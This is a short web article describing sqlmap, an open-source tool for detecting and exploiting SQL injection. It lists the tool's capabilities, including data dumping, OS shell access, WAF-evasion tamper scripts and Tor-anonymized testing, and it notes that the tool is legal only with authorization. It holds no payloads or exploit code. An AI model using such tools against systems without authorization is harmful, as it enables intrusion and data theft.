ConfigsMay 4, 2026·3 min read

sqlmap — Automatic SQL Injection and Database Takeover Tool

An open-source penetration testing tool that automates detection and exploitation of SQL injection flaws in web applications.

AI Open Source
AI Open Source · Community

Introduction

sqlmap is an open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection vulnerabilities. It is widely used by security professionals, bug bounty hunters, and CTF competitors for authorized testing engagements.

What sqlmap Does

  • Detects SQL injection vulnerabilities across boolean-based, time-based, error-based, UNION-based, and stacked queries
  • Supports MySQL, PostgreSQL, Oracle, Microsoft SQL Server, SQLite, and 10+ other DBMS
  • Enumerates databases, tables, columns, and dumps data from vulnerable endpoints
  • Provides OS-level access via database features like xp_cmdshell or UDF injection
  • Supports HTTP authentication, proxies, cookies, and custom headers

Architecture Overview

sqlmap is a single Python application that takes a target URL or request file and runs a battery of injection tests. It uses heuristic detection to identify injectable parameters, then escalates through increasingly aggressive payloads. A tamper script system allows users to bypass WAFs by encoding or transforming payloads before delivery.

Self-Hosting & Configuration

  • Install via pip or clone the repository directly
  • Provide targets via URL, request file, or Burp Suite log import
  • Configure tamper scripts to evade web application firewalls
  • Use --level and --risk flags to control test intensity
  • Supports proxy chains and Tor for anonymized testing

Key Features

  • Automatic fingerprinting of the backend DBMS from injection responses
  • Built-in tamper script library with 50+ WAF bypass techniques
  • File read/write on the server filesystem through SQL injection
  • Interactive OS shell when the database allows command execution
  • Crawling and form-based parameter discovery with --forms and --crawl

Comparison with Similar Tools

  • Havij — Windows-only GUI tool, no longer maintained
  • jSQL Injection — Java-based alternative with GUI, fewer DBMS supported
  • NoSQLMap — focuses on NoSQL databases like MongoDB instead of SQL
  • Ghauri — newer Python tool inspired by sqlmap with improved detection for specific edge cases

FAQ

Q: Is sqlmap legal to use? A: sqlmap is legal to possess and use only against systems you own or have explicit written authorization to test. Unauthorized use is illegal.

Q: Can sqlmap bypass web application firewalls? A: sqlmap includes tamper scripts that modify payloads to evade common WAF rules. Custom tamper scripts can be written for specific WAFs.

Q: Does sqlmap work with POST requests? A: Yes. Use --data to specify POST parameters, or provide a full HTTP request file captured from a proxy like Burp Suite.

Q: How does sqlmap handle HTTPS? A: sqlmap supports HTTPS natively. Use --force-ssl if auto-detection fails.

Sources

Discussion

Sign in to join the discussion.
No comments yet. Be the first to share your thoughts.

Related Assets

DbGate — Cross-Platform Open Source Database Client

An open-source database management tool supporting MySQL, PostgreSQL, SQL Server, MongoDB, SQLite, and more with a modern tabbed interface for queries, data editing, and schema browsing.

AI Open Source

Webiny — Self-Hosted Serverless CMS on AWS

An open-source enterprise CMS and application framework that deploys to your own AWS account using serverless infrastructure with full content management and page building.

AI Open Source

Firezone — Self-Hosted WireGuard VPN with Zero Trust Access

A self-hosted secure access platform built on WireGuard that provides zero-trust network access with identity-based policies and a web management portal.

AI Open Source
Home🔍Search👤Me